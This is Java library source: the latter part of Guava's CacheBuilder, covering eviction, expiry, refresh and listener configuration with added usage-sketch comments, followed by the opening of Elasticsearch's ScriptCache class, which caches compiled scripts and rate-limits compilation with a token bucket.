return MoreObjects.firstNonNull(valueEquivalence, getValueStrength().defaultEquivalence());
}
/**
* Sets the minimum total size for the internal hash tables. For example, if the initial capacity
* is {@code 60}, and the concurrency level is {@code 8}, then eight segments are created, each
* having a hash table of size eight. Providing a large enough estimate at construction time
* avoids the need for expensive resizing operations later, but setting this value unnecessarily
* high wastes memory.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code initialCapacity} is negative
* @throws IllegalStateException if an initial capacity was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> initialCapacity(int initialCapacity) {
checkState(
this.initialCapacity == UNSET_INT,
"initial capacity was already set to %s",
this.initialCapacity);
checkArgument(initialCapacity >= 0);
this.initialCapacity = initialCapacity;
return this;
}
int getInitialCapacity() {
return (initialCapacity == UNSET_INT) ? DEFAULT_INITIAL_CAPACITY : initialCapacity;
}
/**
* Guides the allowed concurrency among update operations. Used as a hint for internal sizing. The
* table is internally partitioned to try to permit the indicated number of concurrent updates
* without contention. Because assignment of entries to these partitions is not necessarily
* uniform, the actual concurrency observed may vary. Ideally, you should choose a value to
* accommodate as many threads as will ever concurrently modify the table. Using a significantly
* higher value than you need can waste space and time, and a significantly lower value can lead
* to thread contention. But overestimates and underestimates within an order of magnitude do not
* usually have much noticeable impact. A value of one permits only one thread to modify the cache
* at a time, but since read operations and cache loading computations can proceed concurrently,
* this still yields higher concurrency than full synchronization.
*
* <p>Defaults to 4. <b>Note:</b>The default may change in the future. If you care about this
* value, you should always choose it explicitly.
*
* <p>The current implementation uses the concurrency level to create a fixed number of hashtable
* segments, each governed by its own write lock. The segment lock is taken once for each explicit
* write, and twice for each cache loading computation (once prior to loading the new value, and
* once after loading completes). Much internal cache management is performed at the segment
* granularity. For example, access queues and write queues are kept per segment when they are
* required by the selected eviction algorithm. As such, when writing unit tests it is not
* uncommon to specify {@code concurrencyLevel(1)} in order to achieve more deterministic eviction
* behavior.
*
* <p>Note that future implementations may abandon segment locking in favor of more advanced
* concurrency controls.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code concurrencyLevel} is nonpositive
* @throws IllegalStateException if a concurrency level was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> concurrencyLevel(int concurrencyLevel) {
checkState(
this.concurrencyLevel == UNSET_INT,
"concurrency level was already set to %s",
this.concurrencyLevel);
checkArgument(concurrencyLevel > 0);
this.concurrencyLevel = concurrencyLevel;
return this;
}
int getConcurrencyLevel() {
return (concurrencyLevel == UNSET_INT) ? DEFAULT_CONCURRENCY_LEVEL : concurrencyLevel;
}
/**
* Specifies the maximum number of entries the cache may contain.
*
* <p>Note that the cache <b>may evict an entry before this limit is exceeded</b>. For example, in
* the current implementation, when {@code concurrencyLevel} is greater than {@code 1}, each
* resulting segment inside the cache <i>independently</i> limits its own size to approximately
* {@code maximumSize / concurrencyLevel}.
*
* <p>When eviction is necessary, the cache evicts entries that are less likely to be used again.
* For example, the cache may evict an entry because it hasn't been used recently or very often.
*
* <p>If {@code maximumSize} is zero, elements will be evicted immediately after being loaded into
* cache. This can be useful in testing, or to disable caching temporarily.
*
* <p>This feature cannot be used in conjunction with {@link #maximumWeight}.
*
* @param maximumSize the maximum size of the cache
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code maximumSize} is negative
* @throws IllegalStateException if a maximum size or weight was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> maximumSize(long maximumSize) {
checkState(
this.maximumSize == UNSET_INT, "maximum size was already set to %s", this.maximumSize);
checkState(
this.maximumWeight == UNSET_INT,
"maximum weight was already set to %s",
this.maximumWeight);
checkState(this.weigher == null, "maximum size can not be combined with weigher");
checkArgument(maximumSize >= 0, "maximum size must not be negative");
this.maximumSize = maximumSize;
return this;
}
/**
* Specifies the maximum weight of entries the cache may contain. Weight is determined using the
* {@link Weigher} specified with {@link #weigher}, and use of this method requires a
* corresponding call to {@link #weigher} prior to calling {@link #build}.
*
* <p>Note that the cache <b>may evict an entry before this limit is exceeded</b>. For example, in
* the current implementation, when {@code concurrencyLevel} is greater than {@code 1}, each
* resulting segment inside the cache <i>independently</i> limits its own weight to approximately
* {@code maximumWeight / concurrencyLevel}.
*
* <p>When eviction is necessary, the cache evicts entries that are less likely to be used again.
* For example, the cache may evict an entry because it hasn't been used recently or very often.
*
* <p>If {@code maximumWeight} is zero, elements will be evicted immediately after being loaded
* into cache. This can be useful in testing, or to disable caching temporarily.
*
* <p>Note that weight is only used to determine whether the cache is over capacity; it has no
* effect on selecting which entry should be evicted next.
*
* <p>This feature cannot be used in conjunction with {@link #maximumSize}.
*
* @param maximumWeight the maximum total weight of entries the cache may contain
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code maximumWeight} is negative
* @throws IllegalStateException if a maximum weight or size was already set
* @since 11.0
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
public CacheBuilder<K, V> maximumWeight(long maximumWeight) {
checkState(
this.maximumWeight == UNSET_INT,
"maximum weight was already set to %s",
this.maximumWeight);
checkState(
this.maximumSize == UNSET_INT, "maximum size was already set to %s", this.maximumSize);
checkArgument(maximumWeight >= 0, "maximum weight must not be negative");
this.maximumWeight = maximumWeight;
return this;
}
/**
* Specifies the weigher to use in determining the weight of entries. Entry weight is taken into
* consideration by {@link #maximumWeight(long)} when determining which entries to evict, and use
* of this method requires a corresponding call to {@link #maximumWeight(long)} prior to calling
* {@link #build}. Weights are measured and recorded when entries are inserted into the cache, and
* are thus effectively static during the lifetime of a cache entry.
*
* <p>When the weight of an entry is zero it will not be considered for size-based eviction
* (though it still may be evicted by other means).
*
* <p><b>Important note:</b> Instead of returning <em>this</em> as a {@code CacheBuilder}
* instance, this method returns {@code CacheBuilder<K1, V1>}. From this point on, either the
* original reference or the returned reference may be used to complete configuration and build
* the cache, but only the "generic" one is type-safe. That is, it will properly prevent you from
* building caches whose key or value types are incompatible with the types accepted by the
* weigher already provided; the {@code CacheBuilder} type cannot do this. For best results,
* simply use the standard method-chaining idiom, as illustrated in the documentation at top,
* configuring a {@code CacheBuilder} and building your {@link Cache} all in a single statement.
*
* <p><b>Warning:</b> if you ignore the above advice, and use this {@code CacheBuilder} to build a
* cache whose key or value type is incompatible with the weigher, you will likely experience a
* {@link ClassCastException} at some <i>undefined</i> point in the future.
*
* @param weigher the weigher to use in calculating the weight of cache entries
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if a weigher was already set or {@link #maximumSize(long)} was
* previously called
* @since 11.0
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue // TODO(b/27479612): consider removing this
public <K1 extends K, V1 extends V> CacheBuilder<K1, V1> weigher(
Weigher<? super K1, ? super V1> weigher) {
checkState(this.weigher == null);
if (strictParsing) {
checkState(
this.maximumSize == UNSET_INT,
"weigher can not be combined with maximum size (%s provided)",
this.maximumSize);
}
// safely limiting the kinds of caches this can produce
@SuppressWarnings("unchecked")
CacheBuilder<K1, V1> me = (CacheBuilder<K1, V1>) this;
me.weigher = checkNotNull(weigher);
return me;
}
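/*
 * Editor's sketch (not part of the Guava source): pairing weigher(...) with
 * maximumWeight(...) in a single chained statement, as recommended above. Key, Graph
 * and approximateSizeInBytes() are assumed placeholder names.
 *
 *   Cache<Key, Graph> cache = CacheBuilder.newBuilder()
 *       .maximumWeight(100_000)
 *       .weigher((Key k, Graph g) -> g.approximateSizeInBytes())
 *       .build();
 */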
long getMaximumWeight() {
if (expireAfterWriteNanos == 0 || expireAfterAccessNanos == 0) {
return 0;
}
return (weigher == null) ? maximumSize : maximumWeight;
}
// Make a safe contravariant cast now so we don't have to do it over and over.
@SuppressWarnings("unchecked")
<K1 extends K, V1 extends V> Weigher<K1, V1> getWeigher() {
return (Weigher<K1, V1>) MoreObjects.firstNonNull(weigher, OneWeigher.INSTANCE);
}
/**
* Specifies that each key (not value) stored in the cache should be wrapped in a {@link
* WeakReference} (by default, strong references are used).
*
* <p><b>Warning:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of keys. Its {@link Cache#asMap} view will therefore
* technically violate the {@link Map} specification (in the same way that {@link IdentityHashMap}
* does).
*
* <p>Entries with keys that have been garbage collected may be counted in {@link Cache#size}, but
* will never be visible to read or write operations; such entries are cleaned up as part of the
* routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the key strength was already set
*/
@GwtIncompatible // java.lang.ref.WeakReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> weakKeys() {
return setKeyStrength(Strength.WEAK);
}
@CanIgnoreReturnValue
CacheBuilder<K, V> setKeyStrength(Strength strength) {
checkState(keyStrength == null, "Key strength was already set to %s", keyStrength);
keyStrength = checkNotNull(strength);
return this;
}
Strength getKeyStrength() {
return MoreObjects.firstNonNull(keyStrength, Strength.STRONG);
}
/**
* Specifies that each value (not key) stored in the cache should be wrapped in a {@link
* WeakReference} (by default, strong references are used).
*
* <p>Weak values will be garbage collected once they are weakly reachable. This makes them a poor
* candidate for caching; consider {@link #softValues} instead.
*
* <p><b>Note:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of values.
*
* <p>Entries with values that have been garbage collected may be counted in {@link Cache#size},
* but will never be visible to read or write operations; such entries are cleaned up as part of
* the routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the value strength was already set
*/
@GwtIncompatible // java.lang.ref.WeakReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> weakValues() {
return setValueStrength(Strength.WEAK);
}
/**
* Specifies that each value (not key) stored in the cache should be wrapped in a {@link
* SoftReference} (by default, strong references are used). Softly-referenced objects will be
* garbage-collected in a <i>globally</i> least-recently-used manner, in response to memory
* demand.
*
* <p><b>Warning:</b> in most circumstances it is better to set a per-cache {@linkplain
* #maximumSize(long) maximum size} instead of using soft references. You should only use this
* method if you are well familiar with the practical consequences of soft references.
*
* <p><b>Note:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of values.
*
* <p>Entries with values that have been garbage collected may be counted in {@link Cache#size},
* but will never be visible to read or write operations; such entries are cleaned up as part of
* the routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the value strength was already set
*/
@GwtIncompatible // java.lang.ref.SoftReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> softValues() {
return setValueStrength(Strength.SOFT);
}
@CanIgnoreReturnValue
CacheBuilder<K, V> setValueStrength(Strength strength) {
checkState(valueStrength == null, "Value strength was already set to %s", valueStrength);
valueStrength = checkNotNull(strength);
return this;
}
Strength getValueStrength() {
return MoreObjects.firstNonNull(valueStrength, Strength.STRONG);
}
/**
* Specifies that each entry should be automatically removed from the cache once a fixed duration
* has elapsed after the entry's creation, or the most recent replacement of its value.
*
* <p>When {@code duration} is zero, this method hands off to {@link #maximumSize(long)
* maximumSize}{@code (0)}, ignoring any otherwise-specified maximum size or weight. This can be
* useful in testing, or to disable caching temporarily without a code change.
*
* <p>Expired entries may be counted in {@link Cache#size}, but will never be visible to read or
* write operations. Expired entries are cleaned up as part of the routine maintenance described
* in the class javadoc.
*
* @param duration the length of time after an entry is created that it should be automatically
* removed
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #expireAfterWrite} was already set
*/
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> expireAfterWrite(long duration, TimeUnit unit) {
checkState(
expireAfterWriteNanos == UNSET_INT,
"expireAfterWrite was already set to %s ns",
expireAfterWriteNanos);
checkArgument(duration >= 0, "duration cannot be negative: %s %s", duration, unit);
this.expireAfterWriteNanos = unit.toNanos(duration);
return this;
}
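/*
 * Editor's sketch (not part of the Guava source): write- and access-based expiration can
 * be combined; an entry is evicted once either deadline has passed. Session is an
 * assumed placeholder type.
 *
 *   Cache<String, Session> sessions = CacheBuilder.newBuilder()
 *       .expireAfterWrite(30, TimeUnit.MINUTES)
 *       .expireAfterAccess(10, TimeUnit.MINUTES)
 *       .build();
 */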
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getExpireAfterWriteNanos() {
return (expireAfterWriteNanos == UNSET_INT) ? DEFAULT_EXPIRATION_NANOS : expireAfterWriteNanos;
}
/**
* Specifies that each entry should be automatically removed from the cache once a fixed duration
* has elapsed after the entry's creation, the most recent replacement of its value, or its last
* access. Access time is reset by all cache read and write operations (including {@code
* Cache.asMap().get(Object)} and {@code Cache.asMap().put(K, V)}), but not by {@code
* containsKey(Object)}, nor by operations on the collection-views of {@link Cache#asMap}. So, for
* example, iterating through {@code Cache.asMap().entrySet()} does not reset access time for the
* entries you retrieve.
*
* <p>When {@code duration} is zero, this method hands off to {@link #maximumSize(long)
* maximumSize}{@code (0)}, ignoring any otherwise-specified maximum size or weight. This can be
* useful in testing, or to disable caching temporarily without a code change.
*
* <p>Expired entries may be counted in {@link Cache#size}, but will never be visible to read or
* write operations. Expired entries are cleaned up as part of the routine maintenance described
* in the class javadoc.
*
* @param duration the length of time after an entry is last accessed that it should be
* automatically removed
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #expireAfterAccess} was already set
*/
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> expireAfterAccess(long duration, TimeUnit unit) {
checkState(
expireAfterAccessNanos == UNSET_INT,
"expireAfterAccess was already set to %s ns",
expireAfterAccessNanos);
checkArgument(duration >= 0, "duration cannot be negative: %s %s", duration, unit);
this.expireAfterAccessNanos = unit.toNanos(duration);
return this;
}
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getExpireAfterAccessNanos() {
return (expireAfterAccessNanos == UNSET_INT)
? DEFAULT_EXPIRATION_NANOS
: expireAfterAccessNanos;
}
/**
* Specifies that active entries are eligible for automatic refresh once a fixed duration has
* elapsed after the entry's creation, or the most recent replacement of its value. The semantics
* of refreshes are specified in {@link LoadingCache#refresh}, and are performed by calling {@link
* CacheLoader#reload}.
*
* <p>As the default implementation of {@link CacheLoader#reload} is synchronous, it is
* recommended that users of this method override {@link CacheLoader#reload} with an asynchronous
* implementation; otherwise refreshes will be performed during unrelated cache read and write
* operations.
*
* <p>Currently automatic refreshes are performed when the first stale request for an entry
* occurs. The request triggering refresh will make a synchronous call to {@link
* CacheLoader#reload} and immediately return the new value if the returned future is
* complete, and the old value otherwise.
*
* <p><b>Note:</b> <i>all exceptions thrown during refresh will be logged and then swallowed</i>.
*
* @param duration the length of time after an entry is created that it should be considered
* stale, and thus eligible for refresh
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #refreshAfterWrite} was already set
* @since 11.0
*/
@GwtIncompatible // To be supported (synchronously).
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> refreshAfterWrite(long duration, TimeUnit unit) {
checkNotNull(unit);
checkState(refreshNanos == UNSET_INT, "refresh was already set to %s ns", refreshNanos);
checkArgument(duration > 0, "duration must be positive: %s %s", duration, unit);
this.refreshNanos = unit.toNanos(duration);
return this;
}
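/*
 * Editor's sketch (not part of the Guava source): the asynchronous reload override that
 * the javadoc above recommends, so refreshes do not run on unrelated read/write threads.
 * Key, Value, backend and executor are assumed placeholder names.
 *
 *   LoadingCache<Key, Value> cache = CacheBuilder.newBuilder()
 *       .refreshAfterWrite(5, TimeUnit.MINUTES)
 *       .build(new CacheLoader<Key, Value>() {
 *         @Override public Value load(Key key) { return backend.fetch(key); }
 *         @Override public ListenableFuture<Value> reload(Key key, Value oldValue) {
 *           ListenableFutureTask<Value> task =
 *               ListenableFutureTask.create(() -> backend.fetch(key));
 *           executor.execute(task);
 *           return task;
 *         }
 *       });
 */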
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getRefreshNanos() {
return (refreshNanos == UNSET_INT) ? DEFAULT_REFRESH_NANOS : refreshNanos;
}
/**
* Specifies a nanosecond-precision time source for this cache. By default, {@link
* System#nanoTime} is used.
*
* <p>The primary intent of this method is to facilitate testing of caches with a fake or mock
* time source.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if a ticker was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> ticker(Ticker ticker) {
checkState(this.ticker == null);
this.ticker = checkNotNull(ticker);
return this;
}
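/*
 * Editor's sketch (not part of the Guava source): a manually advanced Ticker, which is
 * the usual way to test time-based expiration deterministically.
 *
 *   AtomicLong nanos = new AtomicLong();
 *   Cache<String, String> cache = CacheBuilder.newBuilder()
 *       .expireAfterWrite(1, TimeUnit.MINUTES)
 *       .ticker(new Ticker() {
 *         @Override public long read() { return nanos.get(); }
 *       })
 *       .build();
 *   nanos.addAndGet(TimeUnit.MINUTES.toNanos(2));   // advance fake time past the expiry
 */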
Ticker getTicker(boolean recordsTime) {
if (ticker != null) {
return ticker;
}
return recordsTime ? Ticker.systemTicker() : NULL_TICKER;
}
/**
* Specifies a listener instance that caches should notify each time an entry is removed for any
* {@linkplain RemovalCause reason}. Each cache created by this builder will invoke this listener
* as part of the routine maintenance described in the class documentation above.
*
* <p><b>Warning:</b> after invoking this method, do not continue to use <i>this</i> cache builder
* reference; instead use the reference this method <i>returns</i>. At runtime, these point to the
* same instance, but only the returned reference has the correct generic type information to
* ensure type safety. For best results, use the standard method-chaining idiom illustrated in the
* class documentation above, configuring a builder and building your cache in a single statement.
* Failure to heed this advice can result in a {@link ClassCastException} being thrown by a cache
* operation at some <i>undefined</i> point in the future.
*
* <p><b>Warning:</b> any exception thrown by {@code listener} will <i>not</i> be propagated to
* the {@code Cache} user, only logged via a {@link Logger}.
*
* @return the cache builder reference that should be used instead of {@code this} for any
* remaining configuration and cache building
* @throws IllegalStateException if a removal listener was already set
*/
public <K1 extends K, V1 extends V> CacheBuilder<K1, V1> removalListener(
RemovalListener<? super K1, ? super V1> listener) {
checkState(this.removalListener == null);
// safely limiting the kinds of caches this can produce
@SuppressWarnings("unchecked")
CacheBuilder<K1, V1> me = (CacheBuilder<K1, V1>) this;
me.removalListener = checkNotNull(listener);
return me;
}
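/*
 * Editor's sketch (not part of the Guava source): a removal listener that releases a
 * resource, keeping the whole configuration in one chained statement so the
 * re-generified builder reference returned above is the one that gets used.
 * Key and Connection are assumed placeholder types.
 *
 *   Cache<Key, Connection> connections = CacheBuilder.newBuilder()
 *       .expireAfterAccess(2, TimeUnit.MINUTES)
 *       .removalListener(
 *           (RemovalNotification<Key, Connection> n) -> n.getValue().close())
 *       .build();
 */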
// Make a safe contravariant cast now so we don't have to do it over and over.
@SuppressWarnings("unchecked")
<K1 extends K, V1 extends V> RemovalListener<K1, V1> getRemovalListener() {
return (RemovalListener<K1, V1>)
MoreObjects.firstNonNull(removalListener, NullListener.INSTANCE);
}
/**
* Enable the accumulation of {@link CacheStats} during the operation of the cache. Without this
* {@link Cache#stats} will return zero for all statistics. Note that recording stats requires
* bookkeeping to be performed with each operation, and thus imposes a performance penalty on
* cache operation.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @since 12.0 (previously, stats collection was automatic)
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> recordStats() {
statsCounterSupplier = CACHE_STATS_COUNTER;
return this;
}
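/*
 * Editor's sketch (not part of the Guava source): reading the statistics enabled by
 * recordStats(). CacheStats is an immutable snapshot, so it can simply be polled.
 *
 *   CacheStats stats = cache.stats();
 *   double hitRate = stats.hitRate();
 *   long evictions = stats.evictionCount();
 */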
boolean isRecordingStats() {
return statsCounterSupplier == CACHE_STATS_COUNTER;
}
Supplier<? extends StatsCounter> getStatsCounterSupplier() {
return statsCounterSupplier;
}
/**
* Builds a cache, which either returns an already-loaded value for a given key or atomically
* computes or retrieves it using the supplied {@code CacheLoader}. If another thread is currently
* loading the value for this key, simply waits for that thread to finish and returns its loaded
* value. Note that multiple threads can concurrently load values for distinct keys.
*
* <p>This method does not alter the state of this {@code CacheBuilder} instance, so it can be
* invoked again to create multiple independent caches.
*
* @param loader the cache loader used to obtain new values
* @return a cache having the requested features
*/
public <K1 extends K, V1 extends V> LoadingCache<K1, V1> build(
CacheLoader<? super K1, V1> loader) {
checkWeightWithWeigher();
return new LocalCache.LocalLoadingCache<>(this, loader);
}
/**
* Builds a cache which does not automatically load values when keys are requested.
*
* <p>Consider {@link #build(CacheLoader)} instead, if it is feasible to implement a {@code
* CacheLoader}.
*
* <p>This method does not alter the state of this {@code CacheBuilder} instance, so it can be
* invoked again to create multiple independent caches.
*
* @return a cache having the requested features
* @since 11.0
*/
public <K1 extends K, V1 extends V> Cache<K1, V1> build() {
checkWeightWithWeigher();
checkNonLoadingCache();
return new LocalCache.LocalManualCache<>(this);
}
private void checkNonLoadingCache() {
checkState(refreshNanos == UNSET_INT, "refreshAfterWrite requires a LoadingCache");
}
private void checkWeightWithWeigher() {
if (weigher == null) {
checkState(maximumWeight == UNSET_INT, "maximumWeight requires weigher");
} else {
if (strictParsing) {
checkState(maximumWeight != UNSET_INT, "weigher requires maximumWeight");
} else {
if (maximumWeight == UNSET_INT) {
LoggerHolder.logger.log(
Level.WARNING, "ignoring weigher specified without maximumWeight");
}
}
}
}
/**
* Returns a string representation for this CacheBuilder instance. The exact form of the returned
* string is not specified.
*/
@Override
public String toString() {
MoreObjects.ToStringHelper s = MoreObjects.toStringHelper(this);
if (initialCapacity != UNSET_INT) {
s.add("initialCapacity", initialCapacity);
}
if (concurrencyLevel != UNSET_INT) {
s.add("concurrencyLevel", concurrencyLevel);
}
if (maximumSize != UNSET_INT) {
s.add("maximumSize", maximumSize);
}
if (maximumWeight != UNSET_INT) {
s.add("maximumWeight", maximumWeight);
}
if (expireAfterWriteNanos != UNSET_INT) {
s.add("expireAfterWrite", expireAfterWriteNanos + "ns");
}
if (expireAfterAccessNanos != UNSET_INT) {
s.add("expireAfterAccess", expireAfterAccessNanos + "ns");
}
if (keyStrength != null) {
s.add("keyStrength", Ascii.toLowerCase(keyStrength.toString()));
}
if (valueStrength != null) {
s.add("valueStrength", Ascii.toLowerCase(valueStrength.toString()));
}
if (keyEquivalence != null) {
s.addValue("keyEquivalence");
}
if (valueEquivalence != null) {
s.addValue("valueEquivalence");
}
if (removalListener != null) {
s.addValue("removalListener");
}
return s.toString();
}
}
| google/guava | android/guava/src/com/google/common/cache/CacheBuilder.java |
1,129 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.script;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.elasticsearch.common.breaker.CircuitBreaker;
import org.elasticsearch.common.breaker.CircuitBreakingException;
import org.elasticsearch.common.cache.Cache;
import org.elasticsearch.common.cache.CacheBuilder;
import org.elasticsearch.common.cache.RemovalListener;
import org.elasticsearch.common.cache.RemovalNotification;
import org.elasticsearch.core.TimeValue;
import org.elasticsearch.core.Tuple;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.LongSupplier;
/**
* Script cache and compilation rate limiter.
*/
public class ScriptCache {
private static final Logger logger = LogManager.getLogger(ScriptService.class);
public static final CompilationRate UNLIMITED_COMPILATION_RATE = new CompilationRate(0, TimeValue.ZERO);
private final Cache<CacheKey, Object> cache;
private final ScriptMetrics scriptMetrics;
final AtomicReference<TokenBucketState> tokenBucketState;
// Cache settings or derived from settings
final int cacheSize;
final TimeValue cacheExpire;
final CompilationRate rate;
private final double compilesAllowedPerNano;
private final String contextRateSetting;
ScriptCache(
int cacheMaxSize,
TimeValue cacheExpire,
CompilationRate maxCompilationRate,
String contextRateSetting,
LongSupplier timeProvider
) {
this.cacheSize = cacheMaxSize;
this.cacheExpire = cacheExpire;
this.contextRateSetting = contextRateSetting;
CacheBuilder<CacheKey, Object> cacheBuilder = CacheBuilder.builder();
if (this.cacheSize >= 0) {
cacheBuilder.setMaximumWeight(this.cacheSize);
}
if (this.cacheExpire.getNanos() != 0) {
cacheBuilder.setExpireAfterAccess(this.cacheExpire);
}
logger.debug("using script cache with max_size [{}], expire [{}]", this.cacheSize, this.cacheExpire);
this.cache = cacheBuilder.removalListener(new ScriptCacheRemovalListener()).build();
this.rate = maxCompilationRate;
this.compilesAllowedPerNano = ((double) rate.count) / rate.time.nanos();
this.scriptMetrics = new ScriptMetrics(timeProvider);
this.tokenBucketState = new AtomicReference<TokenBucketState>(new TokenBucketState(this.rate.count));
}
<FactoryType> FactoryType compile(
ScriptContext<FactoryType> context,
ScriptEngine scriptEngine,
String id,
String idOrCode,
ScriptType type,
Map<String, String> options
) {
String lang = scriptEngine.getType();
CacheKey cacheKey = new CacheKey(lang, idOrCode, context.name, options);
// Relying on computeIfAbsent to avoid multiple threads from compiling the same script
try {
return context.factoryClazz.cast(cache.computeIfAbsent(cacheKey, key -> {
// Either an un-cached inline script or an indexed script.
// If the script type is inline, the name will be the same as the code, for identification in exceptions,
// but we give the script engine the chance to do better by passing it a separate name + source code;
// in the inline case the name is then anonymous: null.
if (logger.isTraceEnabled()) {
logger.trace(
"context [{}]: compiling script, type: [{}], lang: [{}], options: [{}]",
context.name,
type,
lang,
options
);
}
if (context.compilationRateLimited) {
// Check whether too many compilations have happened
checkCompilationLimit();
}
Object compiledScript = scriptEngine.compile(id, idOrCode, context, options);
// Since the cache key is the script content itself we don't need to
// invalidate/check the cache if an indexed script changes.
scriptMetrics.onCompilation();
return compiledScript;
}));
} catch (ExecutionException executionException) {
Throwable cause = executionException.getCause();
if (cause instanceof ScriptException) {
throw (ScriptException) cause;
} else if (cause instanceof Exception) {
throw new GeneralScriptException("Failed to compile " + type + " script [" + id + "] using lang [" + lang + "]", cause);
} else {
rethrow(cause);
throw new AssertionError(cause);
}
}
}
/** Hack to rethrow unknown Exceptions from compile: */
@SuppressWarnings("unchecked")
static <T extends Throwable> void rethrow(Throwable t) throws T {
throw (T) t;
}
public ScriptStats stats() {
return scriptMetrics.stats();
}
public ScriptContextStats stats(String context) {
return scriptMetrics.stats(context);
}
/**
* Check whether there have been too many compilations within the configured time window, throwing a circuit breaking exception if so.
* This is a variant of the token bucket algorithm: https://en.wikipedia.org/wiki/Token_bucket
*
* It can be thought of as a bucket of water: every time the bucket is checked, water is added in proportion to the amount of time that
* has elapsed since the last check. If there is enough water, some is removed and the request is allowed; if there is not enough water
* the request is denied. Just like a real bucket, any water that would overflow the bucket is discarded - there can never be more
* water in the bucket than the size of the bucket. (A worked numeric example follows the method body below.)
*/
void checkCompilationLimit() {
if (rate.equals(UNLIMITED_COMPILATION_RATE)) {
return;
}
TokenBucketState tokenBucketState = this.tokenBucketState.updateAndGet(current -> {
long now = System.nanoTime();
long timePassed = now - current.lastInlineCompileTime;
double scriptsPerTimeWindow = current.availableTokens + (timePassed) * compilesAllowedPerNano;
// More than a full time window has passed anyway - cap the bucket at its capacity
if (scriptsPerTimeWindow > rate.count) {
scriptsPerTimeWindow = rate.count;
}
// If there are enough tokens in the bucket, allow the request and decrease the tokens by 1
if (scriptsPerTimeWindow >= 1) {
scriptsPerTimeWindow -= 1.0;
return new TokenBucketState(now, scriptsPerTimeWindow, true);
} else {
return new TokenBucketState(now, scriptsPerTimeWindow, false);
}
});
if (tokenBucketState.tokenSuccessfullyTaken == false) {
scriptMetrics.onCompilationLimit();
// Otherwise reject the request
throw new CircuitBreakingException(
"[script] Too many dynamic script compilations within, max: ["
+ rate
+ "]; please use indexed, or scripts with parameters instead; "
+ "this limit can be changed by the ["
+ contextRateSetting
+ "] setting",
CircuitBreaker.Durability.TRANSIENT
);
}
}
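// Worked numeric example of the bucket arithmetic above (illustrative values only, not a claim about
// any real default): with a rate of 75/5m, compilesAllowedPerNano = 75 / 3.0e11 = 2.5e-10. If 4 seconds
// (4.0e9 ns) pass between checks, the bucket gains 4.0e9 * 2.5e-10 = 1 token (capped at 75), and each
// allowed compilation then removes exactly one token.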
/**
* A small listener for the script cache that calls each
* {@code ScriptEngine}'s {@code scriptRemoved} method when the
* script has been removed from the cache
*/
private class ScriptCacheRemovalListener implements RemovalListener<CacheKey, Object> {
@Override
public void onRemoval(RemovalNotification<CacheKey, Object> notification) {
if (logger.isDebugEnabled()) {
logger.debug("removed [{}] from cache, reason: [{}]", notification.getValue(), notification.getRemovalReason());
}
scriptMetrics.onCacheEviction();
}
}
private static final class CacheKey {
final String lang;
final String idOrCode;
final String context;
final Map<String, String> options;
private CacheKey(String lang, String idOrCode, String context, Map<String, String> options) {
this.lang = lang;
this.idOrCode = idOrCode;
this.context = context;
this.options = options;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
CacheKey cacheKey = (CacheKey) o;
return Objects.equals(lang, cacheKey.lang)
&& Objects.equals(idOrCode, cacheKey.idOrCode)
&& Objects.equals(context, cacheKey.context)
&& Objects.equals(options, cacheKey.options);
}
@Override
public int hashCode() {
return Objects.hash(lang, idOrCode, context, options);
}
}
static class TokenBucketState {
public final long lastInlineCompileTime;
public final double availableTokens;
public final boolean tokenSuccessfullyTaken;
private TokenBucketState(double availableTokens) {
this(System.nanoTime(), availableTokens, false);
}
